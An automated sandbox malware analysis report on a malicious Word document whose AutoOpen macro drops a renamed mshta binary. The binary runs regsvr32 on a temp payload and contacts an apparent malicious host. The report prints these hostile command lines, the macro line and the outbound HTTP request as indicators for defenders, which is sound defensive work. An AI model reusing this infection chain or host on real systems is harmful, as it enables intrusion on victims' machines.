Loading ...

Play interactive tourEdit tour

Analysis Report documenti 12.01.20.doc

Overview

General Information

Sample Name:documenti 12.01.20.doc
Analysis ID:326338
MD5:f530de77053a5c25a94f930bb954bcf8
SHA1:46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82

Most interesting Screenshot:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Creates processes via WMI
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Machine Learning detection for sample
Office process drops PE file
Sigma detected: Regsvr32 Anomaly
Allocates memory with a write watch (potentially for evading sandboxes)
Contains capabilities to detect virtual machines
Contains functionality to dynamically determine API calls
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA macro which reads document properties (may be used for disguise)
Document contains embedded VBA macros
Document contains no OLE stream with summary information
Document has an unknown application name
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 1844 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • ms.com (PID: 5308 cmdline: C:\users\public\ms.com C:\users\public\ms.html MD5: 7083239CE743FDB68DFC933B7308E80A)
    • regsvr32.exe (PID: 6192 cmdline: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\users\public\ms.com C:\users\public\ms.html, ParentImage: C:\Users\Public\ms.com, ParentProcessId: 5308, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, ProcessId: 6192
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\users\public\ms.com C:\users\public\ms.html, ParentImage: C:\Users\Public\ms.com, ParentProcessId: 5308, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp, ProcessId: 6192

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: documenti 12.01.20.docVirustotal: Detection: 29%Perma Link
Machine Learning detection for sampleShow sources
Source: documenti 12.01.20.docJoe Sandbox ML: detected

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: ms.com.0.drJump to dropped file
Source: global trafficDNS query: name: nfj254aim.com
Source: global trafficTCP traffic: 192.168.2.3:49711 -> 104.28.6.227:80
Source: global trafficTCP traffic: 192.168.2.3:49711 -> 104.28.6.227:80
Source: global trafficHTTP traffic detected: GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nfj254aim.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: nfj254aim.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: nfj254aim.com
Source: ms.com, 00000001.00000003.224033467.0000000006E03000.00000004.00000040.sdmpString found in binary or memory: http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.aadrm.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.microsoftstream.com/api/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.office.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.onedrive.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://apis.live.net/v5.0/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://augloop.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://augloop.office.com/v2
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://autodiscover-s.outlook.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cdn.entity.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://clients.config.office.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://config.edge.skype.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cortana.ai
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://cr.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dataservice.o365filtering.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dataservice.o365filtering.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://devnull.onenote.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://directory.services.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://graph.ppe.windows.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://graph.ppe.windows.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://graph.windows.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://graph.windows.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://incidents.diagnostics.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://lifecycle.office.com
Source: ms.com, 00000001.00000002.228795664.0000000006A27000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://login.microsoftonline.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://login.windows.local
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://management.azure.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://management.azure.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://messaging.office.com/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ncus-000.contentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://officeapps.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://onedrive.live.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://onedrive.live.com/embed?
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://outlook.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://outlook.office365.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://powerlift.acompli.net
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://settings.outlook.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://shell.suite.office.com:1443
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://skyapi.live.net/Activity/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://store.office.cn/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://store.office.com/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://store.office.de/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://tasks.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://templatelogging.office.com/client/log
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://web.microsoftstream.com/video/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://webshell.suite.office.com
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://wus2-000.contentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drString found in binary or memory: https://www.odwebp.svc.ms

System Summary:

barindex
Office process drops PE fileShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\Public\ms.comJump to dropped file
Source: documenti 12.01.20.docOLE, VBA macro line: Sub AutoOpen()
Source: VBA code instrumentationOLE, VBA macro: Module aH8xms, Function AutoOpenName: AutoOpen
Source: documenti 12.01.20.docOLE, VBA macro line: a8qpd = activedocument.builtindocumentproperties(afav8)
Source: documenti 12.01.20.docOLE indicator, VBA macros: true
Source: documenti 12.01.20.docOLE indicator has summary info: false
Source: documenti 12.01.20.docOLE indicator application name: unknown
Source: Joe Sandbox ViewDropped File: C:\Users\Public\ms.com CBAB3546BDDB2E4EA340C1A7DF680DA6C4F4F2F18B8E98F6D4B66926183E269E
Source: C:\Users\Public\ms.comKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: classification engineClassification label: mal88.expl.winDOC@4/13@1/1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.WordJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{54A156AB-5F10-4F71-BDCB-FB371509B3D5} - OProcSessId.datJump to behavior
Source: documenti 12.01.20.docOLE document summary: title field not present or empty
Source: documenti 12.01.20.docOLE document summary: author field not present or empty
Source: documenti 12.01.20.docOLE document summary: edited time not present or 0
Source: C:\Users\Public\ms.comCommand line argument: Kernel32.dll1_2_00B31460
Source: C:\Users\Public\ms.comCommand line argument: WLDP.DLL1_2_00B31460
Source: C:\Users\Public\ms.comCommand line argument: kernel32.dll1_2_00B31460
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\Public\ms.comKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\Public\ms.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\Public\ms.comFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: documenti 12.01.20.docVirustotal: Detection: 29%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Users\Public\ms.com C:\users\public\ms.com C:\users\public\ms.html
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp
Source: C:\Users\Public\ms.comProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmpJump to behavior
Source: C:\Users\Public\ms.comKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Users\Public\ms.comKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
Source: Binary string: mshta.pdbGCTL source: ms.com, 00000001.00000002.224681367.0000000000B31000.00000020.00020000.sdmp, ms.com.0.dr
Source: Binary string: mshta.pdb source: ms.com, ms.com.0.dr
